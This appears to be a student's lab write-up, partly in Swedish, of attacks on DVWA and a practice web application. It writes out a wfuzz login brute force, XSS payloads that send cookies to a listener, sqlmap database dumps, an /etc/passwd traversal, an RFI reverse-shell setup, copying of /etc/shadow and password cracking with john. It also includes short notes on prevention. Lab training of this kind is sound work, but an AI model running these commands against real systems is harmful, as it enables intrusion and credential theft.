3.1.2 DVWA exercises a) Brute Force ``` wfuzz --hs "incorrect" -c -w /usr/share/wordlists/rockyou.txt -b 'security=low; PHPSESSID=slsam9k24r6cuqc7b414eprnd1' 'http://79.76.53.163/1.1/vulnerabilities/brute/?username=admin&password=FUZZ&Login=Login' ``` ![image](https://hackmd.io/_uploads/SyGw_Twj1e.png) b) Command Injection ![image](https://hackmd.io/_uploads/BJ_XuOGj1e.png) ![image](https://hackmd.io/_uploads/HJXXYdMi1e.png) c) Cross Site Request Forgery (CSRF) > http://158.179.201.94:4280/vulnerabilities/csrf/?password_new=test123&password_conf=test123&Change=Change# ![image](https://hackmd.io/_uploads/SylQxFMoke.png) ![image](https://hackmd.io/_uploads/rkjlZKfjyl.png) d) File Inclusion ![image](https://hackmd.io/_uploads/HkfVwYfjyx.png) e) File Upload ![image](https://hackmd.io/_uploads/r1ifKtMoke.png) ![image](https://hackmd.io/_uploads/HkO7FFMsJg.png) f) SQL Injection ![image](https://hackmd.io/_uploads/HJvIoYziJe.png) `UNION SELECT user, password FROM users#` ![image](https://hackmd.io/_uploads/B1TjhFfjye.png) g) XSS (DOM) <script>alert(document.cookie)</script> h) XSS (Reflected) ``` <script>window.location='http://127.0.0.1:1337/?cookie=' + document.cookie</script> ``` ![image](https://hackmd.io/_uploads/rkng_9zj1e.png) ![image](https://hackmd.io/_uploads/Hkj0P9Gske.png) i) XSS (Stored) ``` <script>window.location='http://127.0.0.1:1337/?cookie=' + document.cookie</script> ``` ![image](https://hackmd.io/_uploads/ByK75cGsyl.png) ![image](https://hackmd.io/_uploads/HkKJ5cGskg.png) 3.2 Web Application Attacks a) Show the SQL you used. ``` > skickar in post-data för att skriva ut alla databasser sqlmap -u "http://129.151.196.226/1.2/appLoginTest.php" --cookie="PHPSESSID=jf2moduo8so799d12319p590f5" --data="username=a&password=a" --dbs > För att hämta tabeller från appdb sqlmap -u "http://129.151.196.226/1.2/appLoginTest.php" --cookie="PHPSESSID=jf2moduo8so799d12319p590f5" --data="username=a&password=a" -D appdb --tables > För att lista alla data i tabelen usertable sqlmap -u "http://129.151.196.226/1.2/appLoginTest.php" --cookie="PHPSESSID=jf2moduo8so799d12319p590f5" --data="username=a&password=a" -D appdb -T usertable --columns ``` b) Take a screenshot of the password protected guest book page as in figure 2. ![image](https://hackmd.io/_uploads/B1aOCxrokg.png) ![image](https://hackmd.io/_uploads/rkEyJ-rjyg.png) 3.2.2 LFI (Local File Inclusion) a) Show the code you used to execute the attack. ``` ../../../../../../etc/passwd ``` b) Take a screenshot of the output or copy the file content as well. ![image](https://hackmd.io/_uploads/rJrkNVLiJl.png) ![image](https://hackmd.io/_uploads/Bye44E8syl.png) 3.2.3 RFI (Remote File Inclusion) With RFI you should a) Show that you can send code to the attacked web server and thus create and access the web server via a reverse shell. The web server must be able to reach the attackers IP-address and NetCat listener. Reverse shell example ``` nc -lnvp 3000 python3 -m http.server 8000 ``` ![image](https://hackmd.io/_uploads/ByEUSiPjJx.png) ![image](https://hackmd.io/_uploads/SyzYrYwjJg.png) ![image](https://hackmd.io/_uploads/rym9rFPiJg.png) ![image](https://hackmd.io/_uploads/r1zyIsPi1e.png) ![image](https://hackmd.io/_uploads/HJRmIsDoyl.png) ![image](https://hackmd.io/_uploads/HJuOLsDs1e.png) ``` python3 -c 'import pty; pty.spawn("/bin/bash")' id find / -perm -4000 2>/dev/null /bin/cp /etc/shadow /tmp/shadow cat /tmp/shadow ``` 3.2.4 Attack summary report In addition to the answers and screenshots from task 3.2.1 – 3.2.3. Answer the following questions as well. a) With a brief report, describe the vulnerabilities and what’s needed to prevent them. 3.2.1 SQL injection SQL Injection uppstår när en applikation använder det man skriev i fältet direkt i SQL-frågor. Detta kan leda till att en angripare injicerar skadlig SQL-kod, vilket gör att databasens innehåll kan läsas, manipuleras eller raderas. man kan motvera detat genom att validera all användarinmatning noggrant, och även se till att databasanvändaren bara har de rättigheter som är absolut nödvändig. /etc/shadow 3.2.2 LFI (Local File Inclusion) LFI uppstår när en applikation inkluderar lokala filer baserat på användarinmatning. Detta kan ge en angripare möjlighet att läsa känsliga filer såsom /etc/passwd som vi kudne göra att exekvera skadlig kod på systemet. Man kan motvera det genom att begränsa vilka filer som kan inkluderas genom att endast tillåta en specificerad lista med godkända filvägar och och tänka på koderna man skriver för att förhindar det som vi såg på DVWA. 3.2.3 RFI (Remote File Inclusion RFI liknar LFI, men här kan angriparen inkludera filer från fjärrservrar. Detta kan leda till att skadlig kod laddas ner och exekveras på den sårbara servern som vi kunde utföra för att få åtkoms till servern. den är ganska lik LFI så på denna för att motverka så kan vi anväada oss av att validera all användarinmatning som påverkar vilka filer som inkluderas. och även ha att vi tillåter endast specifika, godkända filvägar för inkludering b) Finally, submit the user accounts you found on the server as well as their passwords in plain text. ![image](https://hackmd.io/_uploads/rkFivsviJl.png) ``` john --wordlist=/usr/share/wordlists/common.txt unshadow.txt john --show unshadow.txt ``` ![image](https://hackmd.io/_uploads/HJ2V_3Pike.png) ``` john --wordlist=/usr/share/wordlists/rockyou.txt bobby.txt john --show bobby.txt ``` 3.3 Lab feedback jag stötte på problem för jag inte kunde kör min revershell på min vm. och det vara för att den inet kan komma åt porten som kör inne in mitt hem nätver kär av flyttade jag den till azure, jag tog brot min attck maskin och fixade en ny för trodde att jag hade configurare den fel alltså vcn. Där av har jag i sluet av labben andra ip för både min target maskin. Men jag tycker annas att labben vara en rolig labb och väldigt läro rik.